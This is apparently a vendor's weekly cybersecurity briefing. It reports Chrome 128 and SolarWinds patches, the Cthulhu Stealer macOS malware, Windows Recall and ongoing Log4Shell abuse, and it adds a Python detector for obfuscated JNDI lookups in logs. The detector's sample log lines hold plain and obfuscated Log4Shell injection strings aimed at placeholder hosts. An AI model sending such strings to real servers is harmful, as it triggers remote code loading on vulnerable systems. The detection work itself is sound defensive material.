Cyber Security Briefing, 17 - 23 August
Chrome 128 fixes 38 vulnerabilities, among them a 0-day
Google recently released version 128 of Chrome, which fixes 38 vulnerabilities, highlighting one for which there is already an exploit in circulation. This flaw, identified as CVE-2024-7971, is due to a type confusion in the V8 JavaScript engine and WebAssembly, allowing a remote attacker to exploit a heap memory corruption via a manipulated HTML page.
Other high-severity issues fixed include a use-after-free vulnerability in the Passwords feature (CVE-2024-7964), an inappropriate implementation flaw in V8 (CVE-2024-7965) and an out-of-bounds memory access issue in Skia (CVE-2024-7966). In addition, several medium and low severity vulnerabilities have been fixed in components such as PDFium, Permissions, FedCM and the Chrome installer.
✅ Users are advised to update to version 128.0.6613.84/.85 for Windows and macOS, and version 128.0.6613.84 for Linux to mitigate potential threats. Users of Chromium-based browsers are also urged to apply the fixes as soon as they become available. Google will keep details about the vulnerability with active exploit restricted until most users have installed the updates.
SolarWinds fixes critical Web Help Desk vulnerability
SolarWinds has released security patches to fix a critical vulnerability in its Web Help Desk (WHD) software that could allow unauthenticated remote attackers to gain unauthorized access to susceptible instances. The vulnerability, identified as CVE-2024-28987 and with a CVSSv3 score of 9.1 according to the vendor, involves an encrypted credential flaw that allows unauthenticated remote users to access internal functionality and modify data. SolarWinds has not confirmed whether this flaw, fixed in version 12.8.3, has been exploited in the wild, but it does note that the update must be applied manually.
Separately, the issued patches also include fixes for another critical remote code execution vulnerability, identified as CVE-2024-28986 and with a CVSSv3 score of 9.8 according to the vendor. This vulnerability had already been addressed previously, but the new version bundles all the fixes for this flaw, which CISA has added to its catalog of known exploited vulnerabilities.
Cthulhu Stealer: new malware targeting macOS devices
Researchers at Cado Security have published an analysis of Cthulhu Stealer, a new Malware-as-a-Service targeting macOS devices and offered for $500 per month on cybercrime forums. Written in Go, the malware is delivered as an Apple disk image (DMG) that masquerades as a legitimate application and requires user interaction in order to run.
Specifically, the malware asks the victim for their device password and their MetaMask cryptocurrency wallet password, after which it collects information from the infected device, including its IP address and operating system version. Finally, Cthulhu Stealer steals credentials from search engines, cryptocurrency wallets and video game accounts.
The researchers point out that the malware does not seem particularly sophisticated, as it does not have any detection evasion techniques. Also, Cthulhu Stealer has a high degree of similarity with Atomic Stealer, even sharing the same typos in the code.
Microsoft to take back Windows Recall
After Microsoft announced on June 7 its decision to disable the Windows Recall feature by default on Copilot+ PCs, on August 21 it emerged that a revised version of Recall will be made available in October to members of the Windows Insider program. Recall is a feature that stores screenshots of everything the user sees, which drew heavy criticism over possible security issues.
Log4Shell is still being exploited two years later
Two years after its discovery, the Log4Shell vulnerability (CVE-2021-44228, CVSSv3 10) continues to be exploited by cybercriminals to deploy malware on vulnerable systems. Datadog researchers discovered a campaign in which attackers used obfuscated LDAP lookup strings to abuse Log4Shell and deploy XMRig, a cryptocurrency miner.
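The reason obfuscated lookups matter for defenders is that a naive search for the literal string `${jndi:ldap://` misses payloads that hide the keyword behind nested Log4j lookups. The following is an added detection example written for this briefing; it is not code from Datadog's report or from the Log4j project. It unwraps the common `${lower:x}`, `${upper:x}` and `${...:-default}` nesting before matching, and runs over a handful of constructed web-server log lines (the hostnames use the reserved `.invalid` domain and are placeholders, not real indicators).

```python
import re

# Innermost ${...} lookup: a body with no nested $, { or } inside it.
_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup pointing at a remote resolver, which a Log4Shell probe needs.
_JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns)://", re.IGNORECASE)
_MAX_DEPTH = 16  # bound the unwrapping so a hostile string cannot loop us


def _resolve(m: re.Match) -> str:
    """Evaluate one innermost lookup the way Log4j 2 would, or leave it alone."""
    body = m.group(1)
    if ":-" in body:                       # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    key, sep, value = body.partition(":")
    if sep and key.lower() == "lower":     # ${lower:X} -> x
        return value.lower()
    if sep and key.lower() == "upper":     # ${upper:x} -> X
        return value.upper()
    return m.group(0)                      # e.g. ${jndi:...} stays as written


def normalize(text: str) -> str:
    """Repeatedly collapse nested lookups until the string stops changing."""
    for _ in range(_MAX_DEPTH):
        collapsed = _LOOKUP.sub(_resolve, text)
        if collapsed == text:
            return text
        text = collapsed
    return text


def scan_lines(lines):
    """Return (line_no, scheme, normalized_line) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            hits.append((n, m.group(1).lower(), norm))
    return hits


# Constructed sample log lines for this example (not real traffic).
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 404 "${jndi:ldap://resolver.example.invalid/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 404 '
    '"${${lower:j}${upper:n}${::-d}i:${env:NOPE:-l}dap://resolver.example.invalid/b}"',
    '10.0.0.8 - - "GET /docs/jndi-tutorial HTTP/1.1" 200 "curl/8.0"',
]

if __name__ == "__main__":
    for line_no, scheme, norm in scan_lines(SAMPLE_LOGS):
        print(f"line {line_no}: {scheme} lookup -> {norm}")
```

Line 3 is the one a literal-string match would miss: after normalization it reads `${jNdi:ldap://...}`, which the case-insensitive pattern catches, while line 4, which merely mentions "jndi" in a URL path, is not flagged. In a real pipeline the normalized text, not the raw line, is what should feed the match rule.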
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us →